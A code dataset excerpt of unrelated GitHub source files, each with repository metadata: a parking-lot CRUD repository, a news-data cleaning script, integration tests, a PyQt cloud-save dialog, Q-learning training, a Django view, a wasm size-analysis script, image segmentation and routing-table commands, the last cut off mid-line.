self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n if estacio.cadastro_terminado:\n return False, self.ERRO_CADASTRO_FINALIZADO\n\n _val_desc = self._validate_descricao(descricao)\n if _val_desc:\n return False, _val_desc\n\n _val_total = self._validate_total_vaga(total_vaga)\n if _val_total:\n return False, _val_total\n\n error_hora_p = horario_padrao.validate()\n if error_hora_p:\n return False, error_hora_p\n\n if valores_hora:\n try:\n real_valores_hora = [v.to_valor_hora(sess) for v in valores_hora]\n estacio.valores_hora = real_valores_hora\n except ValidationError as e:\n if e.attr == 'valor':\n return False, self.ERRO_VALOR_HORA_NAO_POSITIVO\n else:\n return False, self.ERRO_VALOR_HORA_VEICULO_NAO_ENCONTRADO\n\n estacio.total_vaga = estacio.qtd_vaga_livre = total_vaga\n estacio.descricao = descricao\n estacio.horario_padrao = horario_padrao\n estacio.cadastro_terminado = True\n\n sess.commit()\n\n return True, estacio\n\n def edit( \n self, user_sess: UserSession, sess: Session,\n nome: Optional[str] = None,\n telefone: Optional[str] = None,\n endereco: Optional[Endereco] = None,\n total_vaga: Optional[int] = None,\n descricao: Optional[str] = None,\n foto: Optional[FileStream] = None,\n estacio_id: Optional[str] = None,\n ) -> Tuple[bool, Union[str, Estacionamento]]:\n if user_sess is None:\n return False, self.ERRO_SEM_PERMISSAO\n \n adm = user_sess.user\n\n if user_sess.tipo != UserType.ESTACIONAMENTO:\n estacio = sess.query(Estacionamento).get(estacio_id)\n else:\n estacio = adm.estacionamento\n\n if estacio is None:\n return False, self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n if estacio.cadastro_terminado is False:\n return False, self.ERRO_CADASTRO_NAO_FINALIZADO\n\n _val_nome = self._validate_nome(nome)\n if _val_nome:\n return False, _val_nome\n\n _val_total = self._validate_total_vaga(total_vaga)\n if _val_total:\n return False, _val_total\n \n _val_desc = self._validate_descricao(descricao)\n if _val_desc:\n return False, _val_desc\n\n _val_tel = self._validate_tel(telefone)\n if _val_tel:\n return False, _val_tel\n\n estacio.nome = nome or estacio.nome\n estacio.telefone = telefone or estacio.telefone\n estacio.total_vaga = total_vaga or estacio.total_vaga\n estacio.endereco = endereco or estacio.endereco\n\n if descricao is not None:\n descricao = descricao.strip()\n estacio.descricao = None if descricao == '' else descricao\n\n if foto is not None:\n try:\n fstream = self.image_processor.compress(foto, self.width_foto, self.height_foto)\n except AttributeError:\n return False, self.FOTO_FORMATO_INVALIDO\n except Exception as ex:\n logging.getLogger(__name__).error('edit(): Image processing error.', exc_info=ex)\n return False, self.FOTO_PROCESSING_ERRO\n\n try:\n fname = str(uuid4()) + '.' + self.image_processor.get_default_image_format()\n upload = self.uploader.upload(fstream, self.GROUP_UPLOAD_FOTO, fname)\n except Exception as ex:\n logging.getLogger(__name__).error('edit(): Upload error.', exc_info=ex)\n return False, self.ERRO_UPLOAD\n\n ori_id = int(estacio.foto_fk)\n self.uploader.delete(estacio.foto)\n\n estacio.foto = upload\n sess.query(Upload).filter(Upload.id == ori_id).delete()\n\n sess.commit()\n\n return True, estacio\n\n def list(self, sess: Session, amount: int = 0, index: int = 0) -> Tuple[bool, Union[str, Iterable[Estacionamento]]]:\n if index < 0:\n return True, tuple()\n\n query = sess.query(Estacionamento).offset(index)\n\n if amount > 0:\n query = query.limit(amount)\n\n estacios = query.all()\n\n return True, estacios\n\n def get(self, user_sess: UserSession, sess: Session, estacio_id: Optional[str] = None) -> Tuple[bool, Union[str, Estacionamento]]:\n if estacio_id is None:\n if user_sess is not None and user_sess.tipo == UserType.ESTACIONAMENTO:\n estacio = user_sess.user.estacionamento\n else:\n estacio = None\n else:\n estacio = sess.query(Estacionamento).get(estacio_id)\n \n if estacio is None:\n return False, self.ERRO_ESTACIO_NAO_ENCONTRADO\n\n return True, estacio\n\n def _validate_total_vaga(self, total_vaga: int) -> Optional[str]:\n if total_vaga is not None and total_vaga <= 0:\n return self.ERRO_TOTAL_VAGA_INV\n\n def _validate_descricao(self, descricao: Optional[str]) -> Optional[str]:\n if descricao is not None and len(descricao) > 2000:\n return self.ERRO_DESC_GRANDE\n\n def _validate_nome(self, nome: Optional[str]) -> Optional[str]:\n if nome is not None and len(nome) > 100:\n return self.ERRO_NOME_GRANDE\n\n def _validate_tel(self, tel: Optional[str]) -> Optional[str]:\n if tel is not None:\n if len(tel) > 20:\n return self.TEL_MUITO_GRANDE\n if not validate_telefone(tel):\n return self.TEL_FORMATO_INV\n if not tel.startswith('+') or len(tel) < 3:\n return self.TEL_SEM_COD_INTER\n","repo_name":"BoaVaga/boavaga_server","sub_path":"src/repo/estacionamento_crud_repo.py","file_name":"estacionamento_crud_repo.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74674080440","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"all_news.csv\")\nrecord = pd.read_csv(\"the_record.csv\")\n\ndata = pd.concat([data, record], sort=False)\n# drop this extra index column that was accidentally carried over\n# data = data.drop('Unnamed: 0', 1)\ndata = data[data.columns.drop(list(data.filter(regex='Unnamed: ')))]\n\n\n# the following lines are not combined into one drop_duplicate because if we try to drop with subset=[\"title\", \"text\"] it would only drop rows where both the title AND text match each other\n# but we want to drop all instances where the title OR the text is a duplicate\n\n# drop articles with the same title (keeps the first entry by default)\ndata = data.drop_duplicates(subset=\"title\")\n\n# drop articles with the same text (keeps the first entry by default)\ndata = data.drop_duplicates(subset=\"text\")\n\n# convert text column and publish date to strings\ndata[\"text\"] = data[\"text\"].astype(str)\ndata[\"publish_date\"] = data[\"publish_date\"].astype(str)\n\n# authors was stored as a full string such as \"[Kathryn Hudson]\" so this line will convert it into a proper list of strings such as [\"Kathryn Hudson\"]\ndata['authors'] = data.authors.apply(lambda x: x[1:-1].split(','))\n# keeping only first entry since often other junk would be included in the list such as \"Min. Read\"\ndata['authors'] = data['authors'].str[0]\n\n# this line will drop any rows that have titles which match any of the strings in the list\ndata = data[~data[\"title\"].isin(\n [\"Terms of Use\", \"Privacy Policy\", \"-\", \"- The Weather Network\", \"Public Appearances\"])]\n\n# drops articles with empty body text\ndata = data[~data[\"text\"].isin([\"nan\"])]\n\n# store articles that have no publish date\nno_publish = data[data[\"publish_date\"] == \"nan\"]\n\n# only keep articles that have a 2020 date\ndata = data[data[\"publish_date\"].astype(str).str.match(\"(.*2020.*)\")]\n\ndata = data.append(no_publish)\n\n\n# only keeps rows that have an outlet which we have scraped\n# MODIFY THIS LINE WHEN YOU ADD NEW OUTLETS\ndata = data[data[\"outlet\"].isin([\"thestar\", \"The Record\", \"cbc\", \"ctvnews\", \"nationalpost\", \"torontosun\", \"cp24\", \"mapleridgenews\", \"tricitynews\", \"langleyadvancetimes\", \"abbynews\", \"theprogress\", \"delta-optimist\",\n \"northdeltareporter\", \"surreynowleader\", \"vancouverobserver\", \"vancourier\", \"srtraight\", \"nsnews\", \"richmond-news\", \"burnabynow\", \"richmondsentinel\", \"newwestrecord\", \"bowenislandundercurrent\"])]\n\n\n# drops all rows where the Authors list is empty *AND* the publish date is empty\n# using an or condition because the only time this condition is false is when both predicates are false\n# which would be the case when an articles is missing authors and publish date\ndata = data[(data['authors'] != \"\") | (data['publish_date'] != \"nan\")]\n\n\n# data.sort_values(by=['outlet'], inplace=True, axis=0)\n\n\ndata.to_csv(\"clean.csv\", index=False)\n","repo_name":"jannalouisea/newsworthy_ml","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4871590854","text":"\"\"\"\nThese tests are considered integration tests because they have side effects.\nThey write to the file system (in tests/fixtures/example).\nThey rely on gcc being available.\n\"\"\"\n\n# Standard Library\n# TODO: stub file system?\nimport os\nimport platform\nimport re\nimport shutil\n\n# TODO: rename to test_ui and setup mocking with tkinter\n# for now, run all the steps that ui.py would run in main, but without errors and warnings for the user\nimport unittest\n\n# Third party\nfrom docx import Document\n\nfrom src.file_management.compile import compile_c\nfrom src.file_management.feedback import create_feedback_file, get_missing_names\n\n# functions under test\nfrom src.file_management.zip_archives import setup_safe_mode, unzip, unzip_outer\n\n\nclass Base:\n # needed as class variables to run teardown after all tests, instead of each test.\n cwd = os.path.join(\"tests\", \"fixtures\")\n safe_cwd = os.path.join(cwd, \"example\")\n\n def __init__(self, methodName=\"runTest\"):\n unittest.TestCase.__init__(self, methodName)\n self.safe_cwd = self.__class__.safe_cwd\n self.zip_path = os.path.join(self.cwd, \"example.zip\")\n self.example_feedback_file = os.path.join(self.cwd, \"example_feedback.docx\")\n self.safe_zip_path = os.path.join(self.safe_cwd, \"example.zip\")\n self.example_student_dir = os.path.join(self.safe_cwd, \"final_fake_student_2012347\")\n self.example_student_code = os.path.join(\n self.example_student_dir, \"assignment1\", \"assignment1.c\"\n )\n self.feedback_file = os.path.join(self.safe_cwd, \"feedback.docx\")\n self.all_names = [\"fake_student\", \"other_fake_student\", \"final_fake_student\"]\n self.missing_names = [\"missing_student\"]\n\n @classmethod\n def tearDownClass(cls):\n # delete non-empty example dir\n shutil.rmtree(cls.safe_cwd, ignore_errors=True)\n\n # https://stackoverflow.com/a/18627017/6305204\n # nosetests runs tests in order by name\n # not ideal, but need to enforce order until testing tkinter directly, or using different UI framework.\n def test_01_safe_mode(self):\n \"\"\"\n setup_safe_mode should create a new dir and move the main .zip archive into it before extracting\n \"\"\"\n # example dir should not exist yet\n assert not os.path.exists(self.safe_cwd)\n assert not os.path.exists(self.safe_zip_path)\n setup_safe_mode(self.cwd, self.zip_path)\n assert os.path.exists(self.safe_cwd)\n assert os.path.exists(self.zip_path)\n\n\nclass TestMainSafeModeSharedState(Base, unittest.TestCase):\n def test_02_unzip(self):\n \"\"\"\n unzip_outer should unzip the main .zip archive\n \"\"\"\n assert not os.path.exists(self.example_student_dir)\n # when names is [\"\"], everything is extracted\n unzip_outer(self.safe_zip_path, [\"\"])\n assert os.path.exists(self.example_student_dir)\n\n def test_03_unzip_inner(self):\n \"\"\"\n unzip should unzip each students .zip archives nested in the main zip archive\n \"\"\"\n assert not os.path.exists(self.example_student_code)\n unzip(self.safe_cwd)\n assert os.path.exists(self.example_student_code)\n\n def test_04_missing_names(self):\n \"\"\"\n get_missing_names should return names of students who didn't submit anything\n \"\"\"\n missing_names = get_missing_names(self.safe_cwd, self.all_names + self.missing_names)\n self.assertListEqual(self.missing_names, missing_names)\n\n def test_05_compile(self):\n \"\"\"\n compile_c should compile assignment1.c to assignment1 executable.\n it should also return the error found compiling other_fake_student_2012346/assignment1.c\n \"\"\"\n # compiled_file = self.example_student_code.replace(\".c\", \"\")\n compiled_file = re.sub(r\"\\.c$\", \"\", self.example_student_code)\n\n # gcc output always add .exe on windows\n if platform.system() == \"Windows\":\n compiled_file = f\"{compiled_file}.exe\"\n\n assert not os.path.exists(compiled_file)\n # hide output for tests\n errors = compile_c(self.safe_cwd, capture_output=True)\n assert errors == 1\n assert os.path.exists(compiled_file)\n\n def test_06_feedback_exists(self):\n \"\"\"\n create_feedback_file should create feedback.docx\n \"\"\"\n assert not os.path.exists(self.feedback_file)\n create_feedback_file(self.safe_cwd, self.all_names, self.missing_names)\n assert os.path.exists(self.feedback_file)\n\n def test_07_feedback_content(self):\n expected_table = Document(self.example_feedback_file).tables[0]\n actual_table = Document(self.feedback_file).tables[0]\n\n for expected_row, actual_row in zip(expected_table.rows, actual_table.rows):\n for expected_cell, actual_cell in zip(expected_row.cells, actual_row.cells):\n assert expected_cell.text == actual_cell.text\n\n\nclass TestMainSafeModeSpecificStudents(Base, unittest.TestCase):\n def test_02_unzip(self):\n \"\"\"\n when students are passed, unzip_outer should only extract files containing that students name\n \"\"\"\n assert not os.path.exists(self.example_student_dir)\n unzip_outer(self.safe_zip_path, [\"fake_student\", \"other_fake_student\"])\n\n # final_fake_student is the only one not extracted, all others are extracted\n assert not os.path.exists(self.example_student_dir)\n for dirname in [\"fake_student_2012345\", \"other_fake_student_2012346\"]:\n student_dir = os.path.join(self.safe_cwd, dirname)\n assert os.path.exists(student_dir)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ConorSheehan1/comp_corrector","sub_path":"tests/integration/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981505549","text":"import datetime\nimport sys\nfrom logging import getLogger\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QDialog, QSizePolicy, QLayout, QApplication, QWidget\nfrom legendary.core import LegendaryCore\nfrom legendary.models.game import InstalledGame\n\nfrom rare.ui.components.dialogs.sync_save_dialog import Ui_SyncSaveDialog\nfrom rare.ui.components.tabs.games.game_info.sync_widget import Ui_SyncWidget\nfrom rare.utils.misc import icon\n\nlogger = getLogger(\"Cloud Saves\")\n\n\nclass CloudSaveDialog(QDialog, Ui_SyncSaveDialog):\n DOWNLOAD = 2\n UPLOAD = 1\n CANCEL = 0\n SKIP = 3\n\n def __init__(\n self,\n igame: InstalledGame,\n dt_local: datetime.datetime,\n dt_remote: datetime.datetime,\n ):\n super(CloudSaveDialog, self).__init__()\n self.setupUi(self)\n\n self.sync_widget = QWidget()\n self.sync_ui = Ui_SyncWidget()\n self.sync_ui.setupUi(self.sync_widget)\n\n self.sync_widget_layout.addWidget(self.sync_widget)\n\n self.setAttribute(Qt.WA_DeleteOnClose, True)\n self.setWindowFlags(Qt.Dialog | Qt.CustomizeWindowHint | Qt.WindowTitleHint)\n\n self.status = self.CANCEL\n\n self.title_label.setText(f\"{self.title_label.text()} {igame.title}\")\n\n newer = self.tr(\"Newer\")\n if dt_remote and dt_local:\n self.sync_ui.age_label_local.setText(\n f\"{newer}\" if dt_remote < dt_local else \" \"\n )\n self.sync_ui.age_label_remote.setText(\n f\"{newer}\" if dt_remote > dt_local else \" \"\n )\n # Set status, if one of them is None\n elif dt_remote and not dt_local:\n self.status = self.DOWNLOAD\n elif not dt_remote and dt_local:\n self.status = self.UPLOAD\n else:\n self.status = self.SKIP\n\n self.sync_ui.date_info_local.setText(dt_local.strftime(\"%A, %d. %B %Y %X\") if dt_local else \"None\")\n self.sync_ui.date_info_remote.setText(dt_remote.strftime(\"%A, %d. %B %Y %X\") if dt_remote else \"None\")\n\n self.sync_ui.icon_local.setPixmap(icon(\"mdi.harddisk\", \"fa.desktop\").pixmap(128, 128))\n self.sync_ui.icon_remote.setPixmap(icon(\"mdi.cloud-outline\", \"ei.cloud\").pixmap(128, 128))\n\n self.sync_ui.upload_button.clicked.connect(lambda: self.btn_clicked(self.UPLOAD))\n self.sync_ui.download_button.clicked.connect(lambda: self.btn_clicked(self.DOWNLOAD))\n self.cancel_button.clicked.connect(self.close)\n\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self.layout().setSizeConstraint(QLayout.SetFixedSize)\n\n def get_action(self):\n if self.status == self.SKIP:\n return self.SKIP\n self.exec_()\n return self.status\n\n def btn_clicked(self, status):\n self.status = status\n self.close()\n\n\ndef test_dialog():\n app = QApplication(sys.argv)\n core = LegendaryCore()\n dlg = CloudSaveDialog(core.get_installed_list()[0], datetime.datetime.now(),\n datetime.datetime.strptime(\"2021,1\", \"%Y,%M\"))\n print(dlg.get_action())\n\n\nif __name__ == '__main__':\n test_dialog()\n","repo_name":"Dummerle/Rare","sub_path":"rare/components/dialogs/cloud_save_dialog.py","file_name":"cloud_save_dialog.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"27196498103","text":"from Environment import Environment\nimport numpy as np\nfrom tqdm import tqdm\nimport time\nfrom collections import Counter\n\nc1, c2, c3, arm, last_l, last_r = list(range(0, 6))\nempty, red, blue, green = list(range(0, 4))\nactions = [\"pickL\", \"pickM\", \"pickR\", \"putL\", \"putR\"]\n\n\ndef updateQ(Q, s, a, r, sn, gamma, alpha=0.05):\n old_value = Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], actions.index(a)]\n optimal_fut_value = np.max(Q[sn[c1], sn[c2], sn[c3], sn[arm], sn[last_l], sn[last_r], :])\n update = (1.0 - alpha) * old_value + alpha * (r + gamma * optimal_fut_value)\n Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], actions.index(a)] = update\n\n\n\ndef train_Q(iterations=10000, traj_len=100, alpha=1.0, alpha_decay=0.999, \\\n alpha_min=0.05, gamma=0.95, exp_decay=0.999, exp_min=0.5):\n gamma = 0.95\n Q = np.ones((4, 4, 4, 4, 4, 4, 5))\n exp = 1.0\n for it in tqdm(range(iterations)):\n env = Environment()\n s = env.get_current_state()\n for step in range(traj_len):\n if np.random.uniform(0, 1) <= max(exp, exp_min):\n a = actions[np.random.randint(0, 5)]\n else:\n a = actions[np.argmax(Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], :])]\n r = env.get_reward(s, a)\n sn = env.execute_action(a)\n updateQ(Q, s, a, r, sn, gamma, max(alpha, alpha_min))\n s = sn\n alpha = alpha * alpha_decay\n exp = exp * exp_decay\n return Q","repo_name":"sprkrd/UPC-MAI-CIR","sub_path":"irl/RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15244144840","text":"from django.shortcuts import render\nfrom .models import Userdetail, Activity\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\n\n# Create your views here.\n\n\ndef get(request):\n us = Userdetail.objects.all()\n us_s = []\n\n act_s = []\n\n for i in us:\n lst = []\n if i.userid in Activity.objects.all().values_list(\"userid\", flat=True):\n act = Activity.objects.filter(userid=i.userid)\n for j in act:\n lst.append(\n {\n 'start_time': j.start_time,\n 'end_time': j.end_time,\n })\n us_s.append({\n 'userid': i.userid,\n 'real_name' : i.real_name,\n 'tz' : str(i.tz),\n 'activity' : lst\n })\n\n\n data = {\n 'Member' : us_s\n }\n return JsonResponse(data)\n\n","repo_name":"AmanShrivastav/modeltojson","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29778666766","text":"#!/usr/bin/env python3\n\n# USAGE: python3 lib_bloat.py ... \n\n# NOTE: For this to work reliably, the linked wasm file needs a name section,\n# with mangled names. That means linking with -g or --profiling-funcs, and with\n# -Wl,--no-demangle\n\n# This script tracks weak symbols separately from defined functions. This is\n# weak symbols are not attributable to only one object file, and removing\n# the entire object from the link would not remove the weak symbol from the\n# final linked output unless that object is the only one defining the symbol.\n\nfrom collections import namedtuple\nimport operator\nimport os\nfrom pathlib import Path\nimport subprocess\nimport sys\n\nLLVM_DIR = Path('/s/emr/install/bin')\nBLOATY_DIR = Path.home() / 'software' / 'bloaty'\nVERBOSE = False\n\ntool_output_cache = {}\ndef run_tool(cmd):\n cmd_str = repr(cmd)\n if cmd_str in tool_output_cache:\n return tool_output_cache[cmd_str]\n if VERBOSE:\n print(' '.join([str(p) for p in cmd]))\n\n result = subprocess.run(cmd, capture_output=True)\n if result.returncode:\n print(f'Command Failed:')\n print(' '.join([str(p) for p in cmd]))\n print(result.stdout.decode())\n print(result.stderr.decode())\n raise subprocess.CalledProcessError(result.returncode, cmd)\n result_text = result.stdout.decode()\n tool_output_cache[cmd_str] = result_text\n return result_text\n\n\ndef GetSymSizes(wasm):\n bloaty = BLOATY_DIR / 'bloaty'\n bloaty_output = run_tool([bloaty, '-d', 'symbols', '-n', '0',\n '--demangle=none', '--csv', wasm])\n sym_sizes = {}\n total_size = 0\n for line in bloaty_output.split('\\n'):\n #print(line)\n if (line.startswith('[section') or line.endswith('filesize') or\n line.startswith('[WASM Header') or len(line) == 0):\n continue\n #print(line)\n name, vmsize, filesize = line.split(',')\n total_size += int(filesize)\n sym_sizes[name] = int(filesize)\n\n print(f'{len(sym_sizes)} symbols in {wasm} ({total_size:,} bytes)')\n return sym_sizes\n\n\ndef GetLibFunctions(libs):\n nm = LLVM_DIR / 'llvm-nm'\n func_names = set()\n weak_names = set()\n data_names = {}\n local_data_names = set()\n for lib in libs:\n functions = 0\n weaks = 0\n datas = 0\n local_datas = 0\n nm_output = run_tool([nm, lib])\n for line in nm_output.split('\\n'):\n try:\n addr, symtype, name = line.split()\n #print(f'type {symtype}, name {name}')\n if symtype.lower() == 't': # A global or local defined function sym\n func_names.add(name)\n functions += 1\n elif symtype.lower() == 'w': # A global or local weak symbol\n weak_names.add(name)\n weaks += 1\n elif symtype.lower() == 'd':\n #if name in data_names and not name.startswith('.L') and not 'piecewise_construct' in name:\n # print(f'Warning: duplicate data name {name} in {lib} and {data_names[name]}')\n if name.startswith('.L'):\n local_data_names.add(name)\n local_datas += 1\n else:\n data_names[name] = lib\n datas += 1\n except ValueError: # fewer than 3 tokens\n continue\n if VERBOSE:\n print(f'{functions} functions, {weaks} weak symbols, and {data} data symbols in {lib}')\n return func_names, weak_names, data_names, local_data_names\n\n\nLibSize = namedtuple('LibSize', ['name', 'function', 'weak', 'data', 'local'])\n\ndef GetLibSize(libs, sym_sizes):\n lib_size = 0\n lib_weak_size = 0\n lib_data_size = 0\n local_data_size = 0\n lib_funcs, lib_weaks, lib_datas, lib_local_datas = GetLibFunctions(libs)\n for sym, size in sym_sizes.items():\n if sym in lib_funcs:\n lib_size += size\n elif sym in lib_weaks:\n lib_weak_size += size\n if sym.startswith('.rodata') or sym.startswith('.data'):\n stripped_name = sym.removeprefix('.rodata.').removeprefix('.data.')\n if stripped_name in lib_datas:\n lib_data_size += size\n elif stripped_name.startswith('.L'):\n local_data_size += size\n name = libs[0].name if len(libs) == 1 else '(aggregate)'\n return LibSize(name, lib_size, lib_weak_size, lib_data_size, local_data_size)\n\n\ndef GetDataSize(sym_sizes):\n data_sym_count = 0\n data_size = 0\n for name, size in sym_sizes.items():\n if name == '.data' or name == '.rodata':\n print(f'Warning: wasm file seems to have a single merged {name}'\n f'section of size {size}')\n elif (name.startswith('.data')\n or name.startswith('.rodata')\n or name.startswith('.tdata')):\n data_sym_count += 1\n data_size += size\n return data_sym_count, data_size\n\ndef main(args):\n libs = [Path(f) for f in args[:-1]]\n linked_wasm = Path(args[-1])\n\n sym_sizes = GetSymSizes(linked_wasm)\n linked_sym_size = sum(size for sym, size in sym_sizes.items())\n data_sym_count, data_sym_size = GetDataSize(sym_sizes)\n #print(f'Total symbols size in {linked_wasm}: {linked_sym_size:,}')\n print(f'{data_sym_count} data symbols ({data_sym_size:,} bytes)')\n\n sizes = []\n\n for lib in libs:\n sizes.append(GetLibSize([lib], sym_sizes))\n sizes.sort(key=lambda i: i.function + i.weak, reverse=True)\n\n def Percent(s):\n return s / linked_sym_size * 100\n\n print(' ' * 62 + 'Functions' + ' ' * 4 + '(Functions + weak syms)')\n print(f'{\"Name\":50}' + ' size pct size pct')\n for lib in sizes:\n print(f'{lib.name:50}{lib.function:10,}{Percent(lib.function):10.1f}%\\t', end='')\n combined = lib.function + lib.weak\n print(f'{combined:10,}{Percent(combined):10.1f}%')\n\n\n sizes.sort(key=operator.attrgetter('data'), reverse=True)\n print(' ' * 62 + 'Data')\n print(f'{\"Name\":50}' + ' size pct (of all data)')\n for lib in sizes:\n print(f'{lib.name:50}{lib.data:10,}{lib.data / data_sym_size*100:10.1f}%')\n\n\n libs_size_sum = sum(lib.function for lib in sizes)\n # To calculate weak symbols properly, we want each weak symbol to be counted\n # only once globally, rather than once per input/library. So, run the calculation\n # again, but with all of the inputs together (which deduplicates all symbols).\n # It seems to happen in some\n # cases that the sum of the strongly-defined function sizes in the libs is\n # also larger than the deduplicated total (this shouldn't be true if the inputs\n # are object files rather than archives, and are all included in the link,\n # as this would result in a multiple definition error). Warn in this case.\n # Probably there is some inaccuracy in this script, or perhaps some object\n # file was generated but not actually included in the link.\n deduped_size = GetLibSize(libs, sym_sizes)\n if libs_size_sum != deduped_size.function:\n print(f'warning: sum of strong definition sizes from all inputs is {libs_size_sum}, deduplicated total is {deduped_size.function}')\n #assert total_size.function == libs_size\n deduped_weak_size = deduped_size.function + deduped_size.weak\n #libs_weak_size = sum(lib.function + lib.weak for lib in sizes)\n libs_data_size = sum(lib.data for lib in sizes)\n\n print(f'Total size covered by strong functions in libs: {deduped_size.function:,} of {linked_sym_size:,} bytes ({Percent(deduped_size.function):.1f}%)')\n print(f'Total size covered by strong and weak functions in libs: {deduped_weak_size:,} of {linked_sym_size:,} bytes ({Percent(deduped_weak_size):.1f}%)')\n print(f'Total size covered by public data in libs: {libs_data_size:,} of {data_sym_size:,} bytes ({Percent(libs_data_size):.1f}% of total symbols, {libs_data_size/data_sym_size* 100:.1f}% of data section)')\n local_data = sizes[0].local\n print(f'Total size covered by local data (not attributable to libs): {local_data:,} of {data_sym_size:,} bytes ({Percent(local_data):.1f}% of total symbols, {local_data/data_sym_size*100:.1f}% of data section)')\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"dschuff/lib-bloat","sub_path":"lib_bloat.py","file_name":"lib_bloat.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37251473396","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModified on Fri Jul 2 19:55:47 2021\r\n\r\nAuthor: Vaishak\r\n\r\nDescrption : This code demonstrates the object segmentation using a pre-trained model.\r\n\"\"\"\r\n\r\n## Import required modules/packages\r\nimport os\r\nimport numpy as np\r\nfrom cv2 import cv2\r\nfrom pixellib.semantic import semantic_segmentation\r\n\r\ndef load_images_from_folder(folder)->list:\r\n '''\r\n Description : Loads the images from the given directory\r\n\r\n Input argument(s) : folder (type = str) - Input directory path to input images\r\n\r\n Returns : images (type = list) - List of image\r\n '''\r\n images = []\r\n for filename in os.listdir(folder):\r\n img = cv2.imread(os.path.join(folder, filename))\r\n if img is not None:\r\n images.append(img)\r\n return images\r\n\r\n## Main/Driver Function\r\nif __name__ == \"__main__\":\r\n\r\n # Load Input images\r\n IMAGEPATH = 'Input Images'\r\n COLORIMAGELIST = load_images_from_folder(IMAGEPATH)\r\n\r\n # Process each image\r\n for idx, image in enumerate(COLORIMAGELIST):\r\n\r\n # Segment image\r\n segment_image = semantic_segmentation()\r\n segment_image.load_pascalvoc_model(\"deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\")\r\n process_frame = True\r\n segmap, seg_overlay = segment_image.segmentAsPascalvoc(image, process_frame)\r\n\r\n # Post-Processing on image\r\n gray = cv2.cvtColor(seg_overlay, cv2.COLOR_BGR2GRAY)\r\n ret2, mask = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\r\n # Create a mask to the replace background pixels with the grayscale value \"255\"\r\n seg_output = cv2.bitwise_and(image, image, mask=Mask)\r\n b_plane = (seg_output[:, :, 2] == 0)\r\n g_plane = (seg_output[:, :, 1] == 0)\r\n r_plane = (seg_output[:, :, 0] == 0)\r\n black = np.where(r_plane & g_plane & b_plane)\r\n seg_output[black] = (255, 255, 255)\r\n\r\n # Write output image\r\n cv2.imwrite(\"Output images/seg_output\"+ str(idx)+\".jpg\", seg_output)\r\n \r\n","repo_name":"VaishShetty/Object-Segmentation","sub_path":"MainCode.py","file_name":"MainCode.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21314632962","text":"from src.utils import *\nfrom src.clientMessages import *\nfrom src.readFiles import *\nimport config\n\ndef help():\n print(\n \"Command List:\" \n + \"\\n-update \"\n + \"\\n-step\"\n + \"\\n-packets\"\n + \"\\n-display\"\n + \"\\n-disable \"\n + \"\\n-crash\" \n )\n\ndef update(s1, s2, cost):\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n if(str(primaryNode[\"id\"]) == s1):\n if cost == \"inf\":\n primaryNode[\"cost\"][s2][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][s2][\"nextHop\"] = \"-\"\n else: \n primaryNode[\"cost\"][s2][\"pathCost\"] = int(cost)\n primaryNode[\"cost\"][s2][\"nextHop\"] = s2\n config.var[\"primary\"][\"primaryNode\"] = primaryNode\n print(f\"update SUCCESS\")\n else:\n print(\"update: server id 1 must be the server you input this command on\")\n\ndef step():\n readyToReceiveMessage()\n\n\ndef packets():\n packets = config.var[\"primary\"][\"packets\"]\n print(\"------------------------------\")\n print(f\"Packets Recieved: {packets}\")\n print(\"------------------------------\")\n \n \ndef display():\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n nodeList = config.var[\"servers\"][\"nodeList\"]\n table = []\n table.append(\"Server ID Next ID Cost\\n\")\n primaryID = str(primaryNode[\"id\"])\n table.append(f' {primaryID}\\t\\t{primaryNode[\"cost\"][primaryID][\"nextHop\"]}\\t{primaryNode[\"cost\"][primaryID][\"pathCost\"]}\\n')\n for node in nodeList:\n id = str(node[\"id\"])\n table.append(f' {id}\\t\\t{primaryNode[\"cost\"][id][\"nextHop\"]}\\t{primaryNode[\"cost\"][id][\"pathCost\"]}\\n')\n print(\"\".join(table))\n \ndef disable(id):\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n neighbors = readInitialCosts(config.var[\"settings\"][\"filename\"], config.var[\"settings\"][\"numServers\"], config.var[\"settings\"][\"numEdges\"], primaryNode)\n if neighbors[id] != \"inf\":\n primaryNode[\"cost\"][id][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][id][\"nextHop\"] = 